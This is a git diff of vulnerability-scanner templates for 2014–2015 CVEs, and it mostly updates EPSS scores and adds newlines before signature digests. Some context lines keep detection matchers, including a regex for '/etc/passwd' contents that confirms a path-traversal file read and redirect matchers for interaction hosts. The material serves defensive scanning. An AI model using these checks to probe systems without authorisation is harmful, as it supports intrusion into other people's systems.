a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 722591a86b..1f35e360f8 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90444 + epss-percentile: 0.90447 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ebaf3e1c5357bafe90695e6d747d0507ed3cd16a8f401277be46f0e30f45ee01022100a4353c44e06deb2ca30096abd078405caf02830cf7fb0fbf7f03b8e080bd7992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ebaf3e1c5357bafe90695e6d747d0507ed3cd16a8f401277be46f0e30f45ee01022100a4353c44e06deb2ca30096abd078405caf02830cf7fb0fbf7f03b8e080bd7992:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index e74a88b7a8..b5197fa6e4 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-0554 cwe-id: CWE-264 epss-score: 0.01391 - epss-percentile: 0.84922 + epss-percentile: 0.8489 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a127c43110801dc17306af916c58f056365af6d1e9e1f479501408a19ac53b8022100ee88156b81cd0833fbc77bcee674b0aa2a40198da71c0fd890fcd17df9b71597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205a127c43110801dc17306af916c58f056365af6d1e9e1f479501408a19ac53b8022100ee88156b81cd0833fbc77bcee674b0aa2a40198da71c0fd890fcd17df9b71597:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 7eb2773922..177a48339b 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000005 cwe-id: CWE-22 epss-score: 0.05243 - epss-percentile: 0.92198 + epss-percentile: 0.92184 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index d61019f80f..a08dd2cd74 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1000010 cwe-id: CWE-284 epss-score: 0.03171 - epss-percentile: 0.90088 + epss-percentile: 0.9009 cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index da7073389f..f59ecf2e82 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00773 - epss-percentile: 0.79256 + epss-percentile: 0.79246 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203231150ee2dc8a22c780e349a47d6661b244de85df643ae55e37970d75263476022100b08b8b1deb5b83f5fd1202c8a48f9d67010df0f247071fe9f7c59e8048690d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203231150ee2dc8a22c780e349a47d6661b244de85df643ae55e37970d75263476022100b08b8b1deb5b83f5fd1202c8a48f9d67010df0f247071fe9f7c59e8048690d0a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 0d8e42d22d..7e8bbf8d45 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1427 cwe-id: CWE-284 epss-score: 0.8674 - epss-percentile: 0.98292 + epss-percentile: 0.98294 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 6f13a48dbc..7a0370d85f 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1503 cwe-id: CWE-22 epss-score: 0.91941 - epss-percentile: 0.98664 + epss-percentile: 0.98667 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 2a8f5cb538..8ad134c1f5 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.92959 - epss-percentile: 0.98793 + epss-percentile: 0.98796 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index ace2a6d93e..e5dbfa8ee0 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57936 + epss-percentile: 0.5792 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009561eff1550fc78c1c803f8d112a40aaab5def178346c53da5b21053912136c3022100f3d7e43917cbd365e8cb2af2f8541c17c81a5b7b8cbeaca44ebe92c64476177d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009561eff1550fc78c1c803f8d112a40aaab5def178346c53da5b21053912136c3022100f3d7e43917cbd365e8cb2af2f8541c17c81a5b7b8cbeaca44ebe92c64476177d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 5f912d0d5b..08cc54a4a2 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.01338 - epss-percentile: 0.84583 + epss-percentile: 0.84554 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 91bd416595..1f58b6190d 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.5039 + epss-percentile: 0.50372 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074a2fdaed287e42d5882be2d40035cbb65fa05cd03f3557c636d2fb1914f8f6902210080b41e268586299d02e0d564e6d0236ef5c922381c5b44bdda1064b9a89d4692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022074a2fdaed287e42d5882be2d40035cbb65fa05cd03f3557c636d2fb1914f8f6902210080b41e268586299d02e0d564e6d0236ef5c922381c5b44bdda1064b9a89d4692:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 5b6a21e99e..c5874776e5 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2080 cwe-id: CWE-200 epss-score: 0.95465 - epss-percentile: 0.99194 + epss-percentile: 0.99193 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 5401c84ae4..4bbb611f81 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2166 cwe-id: CWE-22 epss-score: 0.23272 - epss-percentile: 0.96079 + epss-percentile: 0.96075 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index d79195a6e3..d9572e4a0f 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 - epss-percentile: 0.81229 + epss-percentile: 0.81213 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true @@ -42,4 +42,5 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4b0a00483046022100e95c4e6062013276cbfa383d9ee1705d6948961be53cf88183292f63ee7bc102022100df8e18e1cb10198b0469ff7e46079fe94270862c1a1784a37752d63d6ca4744a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e95c4e6062013276cbfa383d9ee1705d6948961be53cf88183292f63ee7bc102022100df8e18e1cb10198b0469ff7e46079fe94270862c1a1784a37752d63d6ca4744a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index e61b832782..481e2afb8e 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.02569 - epss-percentile: 0.89095 + epss-percentile: 0.8909 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -54,4 +54,5 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 490a00463044022011ff46e59dd0f30b6dd3462f2173974a16b876a567ba1632aa644658fe49ffc402207c1a9c3e74ce3afeefe9973450ac2caceee48a2a080d22c941399f05c7f5d01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022011ff46e59dd0f30b6dd3462f2173974a16b876a567ba1632aa644658fe49ffc402207c1a9c3e74ce3afeefe9973450ac2caceee48a2a080d22c941399f05c7f5d01c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 230f224f8e..10e27a16ad 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00665 - epss-percentile: 0.77418 + epss-percentile: 0.77401 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072ebbe4ea08318de3f108a8cab00578b0733b9afebdebcf33bcc64e3d56de5f2022100e29f271b31ecfe7d79ec260b4b5c4d3cbd750e73b70fb0e914a20e8532d800c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022072ebbe4ea08318de3f108a8cab00578b0733b9afebdebcf33bcc64e3d56de5f2022100e29f271b31ecfe7d79ec260b4b5c4d3cbd750e73b70fb0e914a20e8532d800c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index cc8b76ca82..bc9270b2c0 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.76644 + epss-percentile: 0.76609 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# digest: 4b0a00483046022100a52f6389ccad05e62caff97246027a74fbfadd3d480feec9866cdbc40c482212022100c77e5e368496ee1b18fdc9b64a2174b763efe15a725b495a1333704c458f62eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a52f6389ccad05e62caff97246027a74fbfadd3d480feec9866cdbc40c482212022100c77e5e368496ee1b18fdc9b64a2174b763efe15a725b495a1333704c458f62eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 67b2313da6..9bf0925615 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 - epss-percentile: 0.97919 + epss-percentile: 0.97923 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022060c7d941f6674278a3277a7257f83fea354d0b2281b6d61ec4c06bf4f18a0b190220322847ba2731bc3e0ca88614152ba772e87048e84c769a64108b40f7da44e82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022060c7d941f6674278a3277a7257f83fea354d0b2281b6d61ec4c06bf4f18a0b190220322847ba2731bc3e0ca88614152ba772e87048e84c769a64108b40f7da44e82e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 85be3986f6..b68989f740 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.93857 - epss-percentile: 0.98911 + epss-percentile: 0.98914 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 9250eb447b..ce2bb89ef4 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - epss-score: 0.96596 - epss-percentile: 0.99515 + epss-score: 0.96447 + epss-percentile: 0.99458 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index df407ebb85..b85666f058 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 - epss-percentile: 0.89243 + epss-percentile: 0.89239 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220360cd0ce2cd3b50d559d5834e0864574cb583b449d09cb241a65800c1af2c3dd022100cb26ab5a292ccba668fd5896c48224b78c14bafc7f78b05657d646f082b2c160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220360cd0ce2cd3b50d559d5834e0864574cb583b449d09cb241a65800c1af2c3dd022100cb26ab5a292ccba668fd5896c48224b78c14bafc7f78b05657d646f082b2c160:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 7a6b624676..9b5eb347d8 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.83225 - epss-percentile: 0.9812 + epss-percentile: 0.98123 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -47,4 +47,5 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 490a0046304402204f553dd4780ad6ee77079e0a2c48986ac325fb04e398d230b2952a82d91ab0c70220351ed4d2d6a45aa330fa5a027758cc5ca9fce783311c94f5b6db563344b23ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204f553dd4780ad6ee77079e0a2c48986ac325fb04e398d230b2952a82d91ab0c70220351ed4d2d6a45aa330fa5a027758cc5ca9fce783311c94f5b6db563344b23ee8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 172be3294e..1d51f4ba52 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 - epss-percentile: 0.80249 + epss-percentile: 0.80236 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220568a29c189ecf7a79a722202c0030118d64eedff8572ec9568ff318a9ba2ad35022100dabe2a6285357838d22ac940eb2698897a92a6ff751381db7775bfd904b7c8a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220568a29c189ecf7a79a722202c0030118d64eedff8572ec9568ff318a9ba2ad35022100dabe2a6285357838d22ac940eb2698897a92a6ff751381db7775bfd904b7c8a8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 8b8fc9d827..07be4965e4 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4062 cwe-id: CWE-89 epss-score: 0.03004 - epss-percentile: 0.89847 + epss-percentile: 0.89849 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -49,4 +49,5 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4a0a0047304502203c8a016214a23d149af474a539f28cdc2ade875ca849044f5825c1ce813fbc6b022100d54f52b8680d17188212b1da5a52607fd383d2e2d5baf9a1fec017eeadfa7731:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203c8a016214a23d149af474a539f28cdc2ade875ca849044f5825c1ce813fbc6b022100d54f52b8680d17188212b1da5a52607fd383d2e2d5baf9a1fec017eeadfa7731:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 7b4c3893ae..17b5028d2f 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91115 + epss-percentile: 0.91113 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4b0a00483046022100c0b03d01d2e35def7b344129f6e4358b63895333a3bd7d32ece433a457a532cb022100c241e2fda1d65c0f0d8503b0a8a75d61d75b82b8b0e3b273eb87edb3366c4e0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c0b03d01d2e35def7b344129f6e4358b63895333a3bd7d32ece433a457a532cb022100c241e2fda1d65c0f0d8503b0a8a75d61d75b82b8b0e3b273eb87edb3366c4e0e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index c8ad2abd83..363cba7a1c 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.76015 + epss-percentile: 0.75991 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203d3091e3e3bac4d5f5c3f2d567ef8179d3029d4dc5d690d66fb526fc2cd7f1e3022040e743689ead2975303793cae9e309ac07fbb1bbe04025d5d979770ffe07fcbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203d3091e3e3bac4d5f5c3f2d567ef8179d3029d4dc5d690d66fb526fc2cd7f1e3022040e743689ead2975303793cae9e309ac07fbb1bbe04025d5d979770ffe07fcbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 8cc900d9cd..aa0829d90e 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68283 + epss-percentile: 0.68275 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220784b792e65da048eaa34d8ad959d269de338264a6eade09796d81ad51b84328c02202c8359753a9cb5ce360f76a8552926f7a38a21e9e37b4ceabbedf7ad516f1d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220784b792e65da048eaa34d8ad959d269de338264a6eade09796d81ad51b84328c02202c8359753a9cb5ce360f76a8552926f7a38a21e9e37b4ceabbedf7ad516f1d77:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 8dd9fe28d6..27556f05a7 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4414 cwe-id: CWE-22 epss-score: 0.11221 - epss-percentile: 0.94617 + epss-percentile: 0.94614 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 7c24fc842b..54ff25017c 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4632 cwe-id: CWE-22 epss-score: 0.0282 - epss-percentile: 0.89582 + epss-percentile: 0.89578 cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index c53d71b525..e265847050 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.88667 + epss-percentile: 0.88668 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 78a843cb33..8173667ab4 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.7063 + epss-percentile: 0.70616 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022022214e26388169d9e5861f8ae1f103c6d61de21878a8daadeb27ba820aa77e99022100cfef115d6fc41e3651c1c8310e348bdd403e4d8d4589f118d4176d7b1a397472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022022214e26388169d9e5861f8ae1f103c6d61de21878a8daadeb27ba820aa77e99022100cfef115d6fc41e3651c1c8310e348bdd403e4d8d4589f118d4176d7b1a397472:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 7d8a783b14..6eb9eb7560 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88507 + epss-percentile: 0.88508 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index edf66b9c9d..c60e203e7d 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.00166 - epss-percentile: 0.53206 + epss-percentile: 0.53183 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100c36a124cca34d643eeba217061938442596d02901b9ea5d697d764befc144bc3022100b99b92a478afda8bd6d38c22b931041a95ae46f90dcc17b59a9c7cf17b74fa72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c36a124cca34d643eeba217061938442596d02901b9ea5d697d764befc144bc3022100b99b92a478afda8bd6d38c22b931041a95ae46f90dcc17b59a9c7cf17b74fa72:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index e490b7d2f3..d50d74a799 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.74904 + epss-percentile: 0.74898 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100bb5a2b8398540bad43d51aa4522910d32d377abd8fc58c34d121d3b1d49a6c05022100df49fa1f55c5f552c1850bd8c1ff0b0a1930eddefd1847460b2c923a94e31823:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bb5a2b8398540bad43d51aa4522910d32d377abd8fc58c34d121d3b1d49a6c05022100df49fa1f55c5f552c1850bd8c1ff0b0a1930eddefd1847460b2c923a94e31823:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5469.yaml 